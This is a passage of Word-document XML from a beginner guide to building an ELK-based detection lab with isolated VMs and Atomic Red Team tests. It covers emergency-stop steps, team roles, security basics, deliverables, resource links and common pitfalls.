        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Contact person and emergency steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B4A2DC" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Keep all test credentials in a secure local place (not in public repo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8C995" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Template content example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> (docs/runbook.md):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BA360B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Emergency Stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B80076" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">1. If test behaves unexpectedly: on attacker VM run: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>pkill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> -f &lt;atomic-test-process&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F69F1D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>2. On target VM: disconnect network adapter from VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842D2C2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>3. Revert snapshot: VirtualBox -&gt; Machine -&gt; Snapshots -&gt; Restore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C314C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="6781ACB2">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="711BFBC3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I. Assign team roles &amp; create task board</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599648CC" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t>Use GitHub Projects / Trello to create tasks. Example roles and initial tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757395BE" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Infra Lead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t>: Prepare ELK VM, set kernel param, docker compose up. (Task: ELK VM ready)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E449FD8" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beats Lead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">: Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> on test VMs. (Task: Beats installed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B50B31" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logstash Lead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t>: Prepare Logstash pipeline folder. (Task: pipeline skeleton)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B3C08" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rules Lead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t>: Pick Atomic techniques and draft initial detection rules (PowerShell). (Task: 2 rules drafted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBAC198" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Sim Lead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t>: Prepare Atomic Red Team scripts &amp; schedule safe test times. (Task: 3 techniques ready)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1B104" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dashboard/Demo Lead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t>: Create repository README and architecture image; prepare demo slide. (Task: Demo script initial draft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2810EDA0" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Record each task in the board and assign owners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C78E0AD" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="74CB2917">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450269D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1.5 Permissions &amp; security basics (important)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E61FBE" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Do </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> expose Kibana/Elasticsearch ports to the public internet. Restrict access via firewall or SSH tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C732B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Create strong passwords for the Elastic user and document them in a secure file (or use environment variables in .env).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BB2CD7" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>For Docker Compose, set passwords in .env not checked into repo (add .env to .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB3F405" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Use snapshots before running any Atomic tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA53B55" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E20BB7" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Elasticsearch security &amp; TLS: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-tls.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11E82B2C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Kibana security: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/kibana/current/security-settings-kb.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12CCF999" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="30F43DEF">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C90286A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1.6 Deliverables for Step 1 (what you must produce and commit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B4F70" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>A GitHub repo with folders and a README.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD348DD" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">docs/architecture.png or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>architecture.drawio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> (diagram).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409F2392" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>docs/runbook.md (safety &amp; revert steps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34247759" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>VM snapshots taken for all test VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76036CF7" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>atomic-tests/selected-techniques.md listing chosen MITRE techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C78458D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Team roles &amp; task board items created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D111BF3" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="24F8C6ED">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0469F825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1.7 Useful links &amp; resources (step 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70616620" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">GitHub repo creation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/new</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6397CCCA" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>VirtualBox: https://www.virtualbox.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51984244" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Vagrant: https://www.vagrantup.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5932FF39" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Ubuntu download: </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ubuntu.com/download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1476035A" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Windows evaluation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/evalcenter</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E6B5EC7" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Kali Linux: https://www.kali.org/get-kali/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481FABEB" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Docker install (Ubuntu): https://docs.docker.com/engine/install/ubuntu/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021335FC" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Docker Compose: https://docs.docker.com/compose/install/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360AAF55" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>deviantony</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">/docker-elk: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/deviantony/docker-elk</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52F51EDB" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Atomic Red Team: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/redcanaryco/atomic-red-team</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.atomicredteam.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20AD9346" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DF7A47E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>vm.max_map_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> docs &amp; Elasticsearch Docker notes: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="606E5B3A" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="76F44869">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AE97AA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1.8 Common beginner pitfalls &amp; how to avoid them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FD1532" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pitfall:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> Running Atomic tests on corporate laptop. → </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Avoid by using snapshots and isolated VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60230118" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pitfall:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> Not setting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>vm.max_map_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> and failing to start Elasticsearch. → </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Follow commands above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EDDF12" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pitfall:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> Committing secrets (passwords, API keys) to GitHub. → </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Add .env to .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> and store secrets elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759377D9" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pitfall:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> Exposing Kibana to the internet — risk of data leak. → </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Block port 5601 in firewall or use SSH tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704EA91A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STEP 2 — Deploy ELK (Detailed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BA2CE7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Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45596778" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Bring up a working ELK proof-of-concept (single-node) you can use to ingest logs, author rules, and build dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E3405C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Recommended approach for beginners: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Docker Compose</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
